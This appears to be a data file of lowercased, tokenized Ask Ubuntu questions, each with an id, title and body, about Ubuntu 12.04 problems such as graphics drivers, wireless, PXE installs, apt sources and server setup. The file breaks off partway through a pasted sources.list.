184257	is there an application which organizes my `` downloads '' folder automatically ?	i 'm looking for an application which puts all files from my downloads folder into a new generated folder ( called like the date ) per button press or automatically is able to move files to its destinated directory automatically ( p.e . *.png files should be put into /home/user/pictures/random/ , *.avi to /videos/ , ... ) if you are familiar with the dayfolder application : i 'm looking for an application like that but for any folder ( not only the desktop ) . in my case that 's downloads because this folder gets cluttered on my pc very fast . thanks for your advice/help !
184264	why `` unlock keyring '' appears after installing ubuntu one ?	never had this message upon log-in before installing ubuntu one . can i use ubuntu one and avoid being prompted each time like this ? ( ubuntu one is set not to start with the session . ) i use lubuntu 12.04
184266	what is `` unlock keyring '' and how do i get rid of it ?	( in my case this message never appeared before installing ubuntu one - see this question ) . can i use ubuntu one and avoid being prompted each time like this ? i use lubuntu 12.04 . edit : after exchanging comments i add the supplementary info : i am asked for password and to select session if i log out and in ( auto-login is not set ) . ubuntu one is installed but set not to start with session . keyring appears nonetheless . before installing ubuntu one this did n't happen . also , following the advice of con-f-use , i have entered ps -a | grep -i [ u ] buntu in terminal , and got 2346 ? 00:00:01 ubuntuone-syncd , which means that ubuntuone is running when it was not supposed to .
184269	how can i get sli working with 295.40 ?	i 've been doing a lot of googling these last few hours and i 'm not having much luck . perhaps i do n't know exactly what i am looking for . i just recently installed ubuntu 12.04lts x86_64 . looks beautiful ! i have two gtx470 's in sli , and i am finally migrating my desktop over given the hopeful gaming support as of late . my laptop has been enjoying multiple distros of ubuntu for a couple years now . however , new problems come with unexplored territory , here . at first , i only had one working monitor of my two . over on nvidia-xconfig i fixed that , but the only solution that actually worked was twinview . just recently i read here that twinview is not compatible with sli . sweet . when i try to tell it , oh hey , use a separate xscreen , configure it the way i want it , click save to configuration file , enter my password , then a sudo restart lightdm , it 's broken . one screen blacks or whites out ( could n't tell you the specific conditions for each , i 'm dubious at this point , ) and i get this huge error dialogue box upon login . something about incompatible resolutions if i remember right . though i am sure i set the resolutions for each screen correctly . anyway , when i try to enable sli ( sudo nvidia-xconfig -- sli=on ) despite the fact it hates twinview , unity breaks . the sidebar is there , but only one screen works , the mouse is trapped running along the left edge of it , and the background of the sidebar is a solid blue . anyway , this ended up being entirely too verbose , i 'm sorry , but could anyone part some wisdom please ? it would be appreciated ! going to update , here . i have done a lot of tinkering over the past couple hours and the only way i can have two monitors working , let alone sli , is by using twinview . i am starting to wonder if it is a known incompatibility to do so . is it even possible to have sli on ubuntu 12.04lts with two active monitors ? whenever i create separate screens instead of twinview , the second screen refuses to display unless i enable xinerama . if i enable xinerama , however , both monitors display but the unity desktop refuses to load . i login , it shows my background , and then nothing . here is my current working configuration : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc asus vw266h '' horizsync 30.0 - 85.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 470 '' busid `` pci:2:0:0 '' endsection section `` screen '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dfp-1 : 1920x1080_60 +0+0 , dfp-0 : nvidia-auto-select +1920+0 ; dfp-1 : nvidia-auto-select +0+0 , dfp-0 : nvidia-auto-select +1920+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-0 : 1920x1200_60 +1920+0 , dfp-1 : 1920x1080_60 +0+0 ; dfp-0 : nvidia-auto-select +1920+0 , dfp-1 : 1920x1080_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection i recently read the faq for this website . i 'm starting to think this belongs in a forum instead , feedback on this would be appreciated . there is a short story worth of text here , but i do n't know well enough to judge . all i really know is my eyes hurt and i need a smoke .
184271	hp compaq 2510p wireless disabled by hardware switch	i have an hp compaq 2510p laptop running ubuntu 12.04 lts . ubuntu reports that wireless is disabled by means of a hardware switch . there is a 'soft-key ' button on the laptop to control the physical wireless hardware but this does not respond . there is no other button , slider , ( fn ) + combination to control the physical wireless hardware . there is no bios function to disable wireless ( and on xp - previous os - wireless functioned fine ) . mike @ ubuntu : ~ $ rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no running rfkill unblock all does n't change things and i can see no way to change use from 0 : to 1 : ( if that 's even possible - or desirable - in the first place ) . i have checked for additional drivers and the broadcom proprietary wireless driver is already installed and has a green light . essentially , i believe i need to make the hp 'soft-keys ' work - or at least the wireless card toggle .
184272	how can i revive a dead translation team ?	i wish to translate ubuntu in marathi language for which a translation team already exists . but the membership of the team is moderated and unfortunately no new member has been admitted in the team after 2010-dec-12 . all request of membership are pending after that date . i tried to contact administrator of the team at his personal email id but did not get any reply from him . as i am not a team member i can not upload my translated po file . is there any way to take charge of the team and approve all pending request ? it seems that no translation work is currently being carried out . i would like to do the work but i can not . here is the webpage of the team https : //launchpad.net/~ubuntu-l10n-mr see the number of approved and active members
184274	ubuntu crashed when i am browsing web site	i installed ubuntu 12.04 today when i am browsing web site , my whole pc hang . after 30 seconds , there are still not response . then i press ctrl + alt + f1 , usually this will go to cui . but nothing happend to my pc . the funny thing is , i used another pc to ssh to my pc , and i reboot my pc . why it 's suddenly hang ? why i can not use ctrl + alt + f1 after it 's hang
184275	does linux need antivirus	just a thought came in my mind that whether linux need av . if not really then what are the reasons that windows need av and linux do n't need any . thanks
184276	dist-upgrade of diskless ubuntu	i am currently pxe booting a bunch a machine , via the diskless function in ubuntu . what is the best practice when upgrading the image from 10.04 lts to 12.04 lts ? i 've currently made a copy of the image with cp -arpv to ensure that i can switch back to the old image , if something is wrong in the new image . however do-release-upgrade is not available in the diskeless image . any good ideas on what to do ? best regards . edit : the image is ubuntu-server btw .
184280	bash : ./filename : can not execute binary file	i could n't execute a fortran compiled code in ubuntu 11.10 32 bit . error message is bash : ./filename : can not execute binary file . i 've installed the gcc and gfortran libraries too . could anyone help ?
184281	how to automatically resize the dash when screen dimensions change ?	i use a convertible thinkpad ( x201t ) and magick-rotation to rotate the screen by 90 degrees in tablet mode . therefore after rotation the screen 's width is only 800 points ( the ordinary resolution is 1200x800 ) . the dash does not adapt to this new state and therefore if i click on it , it is oversized and i can not reach the applications/files/buttons on its side . is there a way to tell the dash that it should only ever use a width of 800 pixels , or any other solution to automatically adapt its size when rotating ?
184282	black screen on ubuntu 12.04	i 've just upgraded to ubuntu 12.04 and i 'm experiencing some problems . the first thing i noticed is that when i click the workspace switcher all i get is a black screen ( i can guess where the different work-spaces are located and clicked on them , not a practical solution though ) . in addition when i lock the screen or suspend the laptop ( a vaio vpceb4m1e ) i get a shifted screen ( i see the right most vertical stripe on the left size of the monitor and nothing about all the rest , to put it clearly i can see the gear that allows me to turn the pc off , etc , but not much more.. ) when i go to the additional driver menu i see the `` ati/amd proprietary fglrx graphics driver '' are installed and the post-release update version is available . i do n't know if the problem is driver related , so before doing anything i 'd like to get some suggestions from you guys . thanks you !
184286	lubuntu does not boot into gui	i 'm not sure what caused it , but suddenly i ca n't get lubuntu to boot into the gui . instead i get a funky command line interface . which is bad , because i 've yet to learn more than a handfull of commands . i have no problem nukeing the thing , but it 'd be nice if someone could help me . a list of commands i should try running to boot the gui , access a change log , or anything else that might help me figure out what broke would be really appreciated .
184288	how to export thunderbird mail filters	im using mozilla thunderbird on ubuntu and it has alot of message filters and i want to export them so that i can use them on my home pc . i have gone through each and every menu but found no mention of export settings . i will really appreciate how to do this . if successful i will use message filters on mozilla thunderbird installed on both ubuntu and windows 7 . thanks
184290	why i 'm getting this [ ufw block ] in my syslogs ?	i wonder why i get this error on my syslogs : [ 7732763.396193 ] [ ufw block ] in=eth0 out= mac=02:8b:1a:75 : d5:7b:02:8b:1a:40:00:03:08:00 src=x.x.x.x dst=x.x.x.x len=40 tos=0x00 prec=0x00 ttl=64 id=53703 df proto=tcp spt=35651 dpt=8443 window=457 res=0x00 ack rst urgp=0 i have just enabled the ufw . this error means that something going wrong ?
184291	network disabled	i have just installed ubuntu server edition in order to create a home network . but i am not able to find ip of the machine through ifconfig ( showing only localhost ) . then i tried lspci | grep -i ethernet output : 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 13 ) lshw -c network then output was *-network disabled
184299	how to set a custom typing shortcut ?	i want to set a shortcut for my terminal window so that when i type terminal in desktop it will open . is there any way to make a custom typing shortcut ? like www and something like that ?
184300	how can i change firefox 's default dictionary ?	it 's aboot time i asked this one . firefox thinks i 'm canadian . i 've got absolutely nothing against canadians and their spelling is a lot better than americans ' but i do n't spell specialised with a z . there are other , similar issues where i 'm writing something and suddenly the dunce-squiggle pops up . anyway ... how on earth does one set the default language ? can i remove english ( canada ) completely ? some clarifications as to why some of these answers are n't right for me , but might be right for somebody else : select another dictionary in firefox by right clicking a textarea â this did n't hold between sessions . i would quit firefox sipping my cup of tea , start it back up and be halfway through o canada . remove the canadian dictionary from firefox â simple : i did n't have it installed . the only dictionary language pack i had installed in firefox is gb . in my case i had somehow installed system-wide dictionary packages for en_ca and en_za . i 've still no idea why or even how these kept replacing the firefox default because i also have a system-wide en_gb dictionary package . very odd . package .
184301	ubiquity automatic install stops at keyboard layout chooser	i am trying to automate 12.04.1 64bit installation using ubiquity & preseed on a desktop live cd . it almost works fine . i edited the txt.cfg and added label unattended menu label ^unattended installation kernel /casper/vmlinuz append file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.lz quiet splash noprompt -- this is my custom.seed file the problem is that , the installer shows the keyboard layout chooser and i have to click next . then the correct language & keyboard layout ( german ) is already preselected . what am i missing , or what 's wrong in my custom.seed file , to automate the next click ?
184306	ubuntu server 12.04 what is it	know i now what a server is , at school we used to mess with red-hat ( 2003 ? ) . mostly just do exactly what the teacher/textbook tells u to . ( did n't learn allot ) but newer really knew what a server could do . my question is what is ubuntu server 12.04 and what can u do with it
184310	wifi not working on all networks ?	i have an asus ul30vt laptop with ubuntu ( and windows ) . at home i have not problems connecting to our wireless network , but on my school after the holidays they have changed the network and when i try to login it just keeps trying , but never succeeds . i am dual-booting and on windows it is not problem to connect to the schools wifi . i find it strange that it works at home but not on the school . what might be the reason for that ? i 'm using the atheros ar9285 wireless network adapter
184312	how do i get the 12.04 login screen to turn off screen after timeout ?	on 12.04 , the login screen does n't timeout or go to screensaver after a set time . i have a number of machines in a testbed that spend a lot of time waiting for logins and i 'm afraid the monitors will get damaged . thanks
184315	pxe linux kernel line for preseed	i want to setup a preseed for my edubuntu 12.04 on my pxe server , running pxe linux but i ca n't seem to figure out how to add the preseed . label install edubutnu junior 12.04 x86 menu label edubuntu junior 12.04 x86 kernel edubuntu/vmlinuz append boot=casper netboot=ntf nfsroot=10.30.92.10 : /images/isos/edubuntu initrd=edubuntu/initrd.lz preseed/url=http : //10.30.92.10/edubuntu1204/juniorgrades.seed splash -- label install edubutnu senior 12.04 x86 menu label edubuntu senior 12.04 x86 kernel edubuntu/vmlinuz append boot=casper netboot=ntf nfsroot=10.30.92.10 : /images/isos/edubuntu initrd=edubuntu/initrd.lz preseed/url=http : //10.30.92.10/edubuntu1204/seniorgrades.seed splash --
184316	12.04 is n't recognising my screen properly after an nvidia failed driver update	i updated my nvidia drivers via the additional drivers tab and the installation went ahead and installed then requested a reboot , after the reboot i lost the desktop and it instead booted to command line . so in response to this i ran these 2 commands to repair it . sudo apt-get purge nvidia* then reinstalled the drivers by running this . sudo apt-get install nvidia-current-updates-dev i regained my desktop environment after a reboot but since then my screen ( benq 27 '' ) is now shown under displays as a laptop and it will not detect the benq , even though it does offer a full range of resolutions and aspect ratios . can someone please give me a push into the right direction please ?
184321	win7 installation on virtualbox	i have ubuntu 12.04 installed on my machine . i also installed virtualbox so that i can run windows 7 . i set my virtual box with 4 gb ram and 25 gb virtual hdd and after i press start , it doesnt boot from the windows dvd in the optical drive , but instead i get this error : failed to open a session for the virtual machine win7 . vt-x features locked or unavailable in msr . ( verr_vmx_msr_locked_or_disabled ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb } do you have any idea what is it and how i could overcome this ? thank you !
184328	anthy ( japanese input ) keyboard shortcut	one particularly interesting keyboard shortcut when typing japanese is the ability to switch the current input between the 3 set of characters which can be used in japanese . on windows and most of the japanese input systems , the conversion from hiragana to katakana for instance is bound to f7 . is there a way to mimic this behavior on ubuntu ( and preferably using a key which is less commonly used than this one ) ? generally speaking , is there a way to tune the behavior of anthy on ubuntu ? thanks . ps : just to make things clear japanese input works but is unpractical . i want to customize the japanese input behavior , not have directions for initial setup .
184330	is there a `` passwords and keys '' dialogue in lubuntu desktop ?	getting this answer , it seems that there must be a `` passwords and keys '' dialogue in lubuntu , but i can not see a button for it in my menus nor in /usr/share/applications .
184332	how do i install ubuntu on a new build ?	i 've just completed a new build and want to install ubuntu . i can download from another w7 pc . can i boot from the memory stick ?
184341	can not see desktop after 12.04 to 12.04.1 upgrade	after upgrading ubuntu 12.04 lts to 12.04.1 lts through the update manager , i can no longer see my desktop or access any other features of os . not sure if my video card a/o driver is not compatible with the new release or what the problem might be . i am able to select the os in the new grub , but it does n't do much after that .
184343	no webcam recognition in skype with fluxbox	i 'm using ubuntu with fluxbox and i would like to video chat on skype . however , skype does n't recognize my webcam . ubuntu 12.04 skype 4.0.0.8 libv4l-0 and libgstreamer0.10 are installed luvcview provides an awesome output from my webcam , so it 's working , just not in skype ( which means it works in cheese as well ) reinstalling skype with gdebi did n't solve the problem . reinstalling ubuntu with fluxbox minimal install from scratch does n't solve the problem either . now , my question : does anyone know what skype needs for webcam recognition in fluxbox or under fluxbox ?
184352	how to start a never ending script at startup	i 'm trying to automatically run a never ending script ( so it does n't return 0 on exit ) at startup on my headless ubuntu 12.04 server with no gui . i have tried @ reboot nohup /home/luke/netup.sh & in crontab and the script does n't work properly although it appears to run . i have tried update-rc.d netup.sh defaults , the script started but still did n't run properly and most of the other programs that are supposed to auto start did n't start . the script attempts to monitor and record internet outages and contains a while-do loop . it works when logged in to the server and started manually . here is the script # ! /bin/bash # # script to monitor internet up time echo `` server started '' `date `` + % f % t '' ` > > /home/luke/netup.log start=0 while [ 1 ] ; do # continuous loop # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /bin/ping -q 8.8.8.8 -c1 1 > /dev/null 2 > /dev/null # ping test ping= $ ? # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if [ $ ping = 0 ] ; then # ping success if [ $ start -ne 0 ] ; then # was down end= $ ( date + % s ) time= $ ( ( $ end - $ start ) ) start=0 let time= ( $ time/60 ) # convert seconds to minutes echo `` failed '' $ fail_time `` for '' $ time `` minutes '' > > /home/luke/netup.log fi else # ping failure if [ $ start -eq 0 ] ; then # was up start= $ ( date + % s ) fail_time= $ ( date `` + % f % t '' ) fi fi # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if [ $ ping = 0 ] ; then # wait sleep 60 else sleep 10 fi done
184358	resizing boot partition with full disk encryption	i have seen the answers to the general question regarding resizing the boot partition . in my case , i have installed ubuntu 12.04 alternate with full disk encryption . since the drive can not be mounted during the resize operation , wo n't this corrupt the main partition ? i have everything backed up so i could potentially do a re-install , but i do not know how to specify the boot partition size prior to encryption .
184360	how can i select which java to use ?	i have installed both openjdk 6 and 7 . when i run `` java somefile '' from the command line , openjdk 6 is invoked . i do not want to change this default behavior . what command can i use to run my non-default openjdk 7 installation instead ? ( i am used to running `` python somefile '' to invoke the default python , `` python2.7 somefile '' to use python 2.7 specifically and `` python3 somefile '' to use python 3 specifically . )
184362	icons label of unity launcher sometimes disappear	from a while the icons label of unity disappear sometimes . if i 'm not wrong this issue started with the latest update of unity ( i have unity 5.14.0 ) . i 'm using ubuntu 12.04.1 . any idea to fix this issue ?
184365	setting servertokens and serversignature in apache	i have been following this tutorial closely http : //net.tutsplus.com/tutorials/php/how-to-setup-a-dedicated-web-server-for-free/comment-page-8/ # comments i have installed apache php & mysql i have run the command sudo nano /etc/apache2/apache2.conf and i am trying to set the “servertokens full” to “servertokens prod” and “serversignature on” to “serversignature off” , but i can not seem to find these lines , what could i be doing wrong ? im new to setting up dedicated servers so any guidance would be helpful
184367	what should vm writeback timeout be set to for a laptop ?	i am using powertop to check that my machine is setup in a way that will give me good battery life . after installing laptop-mode-tools all of the `` tunables '' section shows `` good '' except vm writeback timeout . on the powertop page , it seems to suggest that 1500 ( i.e . 15 seconds ) is a good value . checking cat /proc/sys/vm/dirty_writeback_centisecs shows that my current value is 60000 ( i.e . 600 seconds or 10 minutes ) . i believe a larger value means to wait longer between writes ( which means spinning up the drive less frequently ) . do i really need to set the timeout longer than ten minutes ?
184373	unable to restart ssh daemon : missing init script	when i try to restart the ssh server i get the following output : bash : /etc/init.d/ssh : no such file or directory
184378	apt-get not working	everything i try with apt-get fails . i am installing ubuntu server for the first time . it is version 12.04 lts . when i run : apt-get update i get failed to fetch http : //gb.whatever goes here ... ... if i run apt-get install install build-essential i get `` unable to locate package build-essential '' i have looked at the sources.list but do not know what should and should n't be in there . this is the current content of sources.list : # see help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu precise main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu precise-updates main restricted
184379	font assamese inscript	i am need to use assamese inscript ( unicode font ) in ubuntu desktop for data entry process but i found only bengali not assamese .
184382	configuring php on ubuntu server	i have been following this tutorial http : //www.howtoforge.com/installing-apache2-with-php5-and-mysql-support-on-ubuntu-12.04-lts-lamp and i have got to the part where i am running a simple test to determine whether php has been installed properly the installation went fine , i installed php5 using the following command apt-get install php5 libapache2-mod-php5 and i then restarted the server . to see whether php5 has been installed i did the following created a file vi /var/www/info.php edited the file < ? php phpinfo ( ) ; ? > after trying to run it on my server i get a 404 not found error . what could be the problem ?
184383	usb hub keep changing ports	i have an external powered usb hub and i 'm using gammu to send some smss , but every time the daemon connect to one specific modem , it has the port changed . gammu is able to send just one sms and after that the port is changed . i 've already tried using : /dev/ttyusb3 /dev/serial/by-path/pci-0000:00:0b.0-usb-0:3.4.3:1.0-port0 is there anything to do which will stop the ports to be changed or use any other fixed port ?
184384	how can i create a wifi hotspot like in connectify ?	when i had windows 7 i used connectify ( http : //www.connectify.me ) to create a wifi hotspot . now i have a wireless connection on my netbook to browse the web and i want to share that wireless connection with my android smartphone . i only have the wireless connection ( i do n't have a wired connection ) on my netbook . how can i share it ? i use ubuntu 12.04 lts .
184386	using quickly for text-heavy app	i am trying to create a small app that displays documentation . when it is run , the application window will display a main menu with buttons labeled 'document 1 ' , 'document 2 ' , etc . if a user clicks on one of those buttons , the text from the corresponding document will be displayed in the window . very basic . the text documents range in length from 1000 to 5000 words , and they need basic formatting ( bold , italic , maybe one or two font choices ) . my question is this : what is the best way to store and display long blocks of formatted text , using quickly ? there seems to be a few options : ( 1 ) i could load the text blocks into long python strings , ( 2 ) i could load the text from text files , or ( 3 ) i could somehow copy and paste the formatted text into glade . in the first two options , i 'm not sure how i would format the text ( add italic and bold , for instance ) once it was loaded . i have experience with php/mysql/html/css/javascript , but i 'm new to python . any help would be appreciated .
184388	ubuntu 12.04 cursor changes	i have a weird problem with my ubuntu 12.04 dual screen setup ( toshiba laptop + one monitor ) . after a while the cursor on one screen completely changes its shape ( not every time ) . i do n't really know how to describe it because it 's always something else . sometimes i get four or five vertical lines instead of a cursor , sometimes i can only see part of the cursor , etc , sometimes weird shade appears . this only happens on one screen simultaneously . if i go to the other screen , the cursor appears to be fine but when i change screens , the cursor changes . i tried to do a screenshot but when i do , the cursor looks just fine . i 'm using unity and gnome 3 but the problem is on both desktop environments . nothing is wrong with my screen though because i 'm also using windows and i do n't have any problems there .
184391	uploaded a package to ppa but it 's not showing and no email from launchpad	i uploaded a package to my ppa over three hours ago , with no response from launchpad .
184397	how do i pipe terminal standard output ( stdout ) to the clipboard ?	for example , say i want to list the contents of a folder and directly paste them into a chat window for a friend to see . i realize i could do ls > filename.txt to create a file ( filename.txt ) with those contents ; i 'd then have to open or print the file and manually select and copy the text block ( which can be annoying/tedious . ) i clearly could also select and copy the output of ls directly from within the terminal window . it would be much faster/easier to simply pipe standard output to the clipboard . what terminal command allows me to do this ?
184403	how to control computer through ipod	i have enabled the setting that allows people who connect to my computer to control it . now , i was wondering if there was a way to connect to it through my ipod and control it from there ? if so , do you guy 's reccomend any apps ? also , where do i find the info on how to connect to my computer ? thanks !
184406	how to switch between gfx cards on macbook pro 15 '' 8.2	i have a macbook 15 '' pro 8.2 which apparently is supposed to be switchable between the gfx cards with vgaswitcheroo . but /sys/kernel/debug/ contains no switcheroo folder . syslog gives me this . [ 21.631041 ] vga_switcheroo : enabled [ 21.631075 ] radeon 0000:01:00.0 : invalid rom contents [ 21.631149 ] radeon 0000:01:00.0 : invalid rom contents [ 21.631154 ] [ drm : radeon_get_bios ] *error* unable to locate a bios rom [ 21.631163 ] radeon 0000:01:00.0 : fatal error during gpu init [ 21.631165 ] [ drm ] radeon : finishing device . [ 21.631166 ] [ ttm ] memory type 2 has not been initialized [ 21.632193 ] radeon 0000:01:00.0 : no bo for sa manager [ 21.632197 ] vga_switcheroo : disabled it seems that it tries to enable it but then fails . in other faqs on the net i hear that when booting in efi mode there is no bios . and because of this the ati card cant initialize properly . sounds like it could be the reason . anyone know how to load the bios rom when in efi mode ? -- ok some updates -- there is a patch that works . allowing the loading of the video bios from a file for the 3.4 kernel . these features have been merged into 3.6-rc 3 apparently . but i 'm on that kernel and still cant switch over to the ati card . apparently others have the same issue
184407	can not install ubuntu using wubi	used wubi a few months ago on both windows xp and 7 systems with no problem . but now , i am unable to install on either for the last 2 weeks . from the log 09-05 11:36 debug commonbackend : could not find any iso or cd , downloading one now 09-05 11:36 debug tasklist : new task get_metalink 09-05 11:36 debug tasklist : # # # running get_metalink ... 09-05 11:36 debug downloader : downloading http : //cdimage.ubuntu.com/xubuntu/releases/12.04/release/xubuntu-12.04-desktop-amd64.metalink > c : \ubuntu\install 09-05 11:36 error commonbackend : can not download metalink file http : //cdimage.ubuntu.com/xubuntu/releases/12.04/release/xubuntu-12.04-desktop-amd64.metalink err= [ errno 14 ] http error 404 : not found
184409	problem trying to add refresh option to right click menu	i am trying to add refresh option to right click menu in ubuntu 12.04 64bit . i tried with the command sudo add-apt-repository ppa : dr3mro/nautilus-actions-extra sudo apt-get update sudo apt-get install nautilus-refresh but throws an error `` ppa is obselete ''
184411	stuck on stopping system v runlevel compatibility	i tried doing ctrl+alt+f1 but i can not login since every time i type at the password field no characters are being input or i just got the wrong username password . how do i solve this ?
184414	recover data from image file ( usb disk )	i have 8gb usb flash drive ( pen drive ) . i used it and un-mount safely . but after next insertion it shows `` no partition available '' . i tried it in windows too . i did not format it . i used disk utility ( ubuntu ) and create a 8gb disk image . it saved in *img format . now how can i read it ? i tried mount command but it shows sudo mount -o iocharset=iso8859-1 disk.img penr/ mount : you must specify the filesystem type fdisk -l : disk /dev/sdb : 8053 mb , 8053063680 bytes 248 heads , 62 sectors/track , 1022 cylinders , total 15728640 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xffffffff disk /dev/sdb does n't contain a valid partition table my pen drive was fat32 gparted shows unallocated disk . disk utility asked for format . i have so much important data saved in disk . please help . i am helpless . i believe linux is so powerful so that it can recover my data . thanks in advance .
184421	update manager and software centre not working	i tried to update ubuntu 12.04 through the update manager . after downloading all the updates , it asked me to restart the system for the installation of the downloaded packages , after which neither the update manager nor the software centre are working . i 'm getting the following message while trying to update through update manager : the following packages have unmet dependencies : aptitude : depends : libapt-pkg4.12 ( > = 0.8.16~exp12ubuntu6 ) but 0.8.16~exp12ubuntu10.2 is installed depends : libboost-iostreams1.46.1 ( > = 1.46.1-1 ) but it is not installed depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed depends : libcwidget3 but it is not installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libncursesw5 ( > = 5.6+20070908 ) but 5.9-4 is installed depends : libsigc++-2.0-0c2a ( > = 2.0.2 ) but 2.2.10-0ubuntu2 is installed depends : libsqlite3-0 ( > = 3.6.5 ) but 3.7.9-2ubuntu1.1 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed gnome-sudoku : depends : python ( < 2.8 ) but 2.7.3-0ubuntu2 is installed depends : gnome-games-data ( = 1:3.4.1-0ubuntu1 ) but 1:3.4.1-0ubuntu2.1 is installed python-gi-cairo : depends : python ( < 2.8 ) but 2.7.3-0ubuntu2 is installed depends : python-gi ( = 3.2.2-1~precise ) but 3.2.0-3 is installed i have tried using sudo apt-get install -f in addition to this , during the booting operation i 'm getting an error message : hd0 out of disk , press any key to continue
184424	remove duplicate source entry	this is my source.list and seems fine to me # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 11.10 ] / natty main restricted # deb cdrom : [ ubuntu 11.04 _natty narwhal_ - release i386 ( 20110427.1 ) ] / natty main restricted # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / dists/oneiric/main/binary-i386/ # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / oneiric main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb-src http : //ma.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu natty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.ubuntu.com/ubuntu precise-updates restricted main multiverse universe deb http : //security.ubuntu.com/ubuntu/ precise-security restricted main multiverse universe deb http : //archive.ubuntu.com/ubuntu precise main universe deb-src http : //extras.ubuntu.com/ubuntu precise main # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb-src http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : 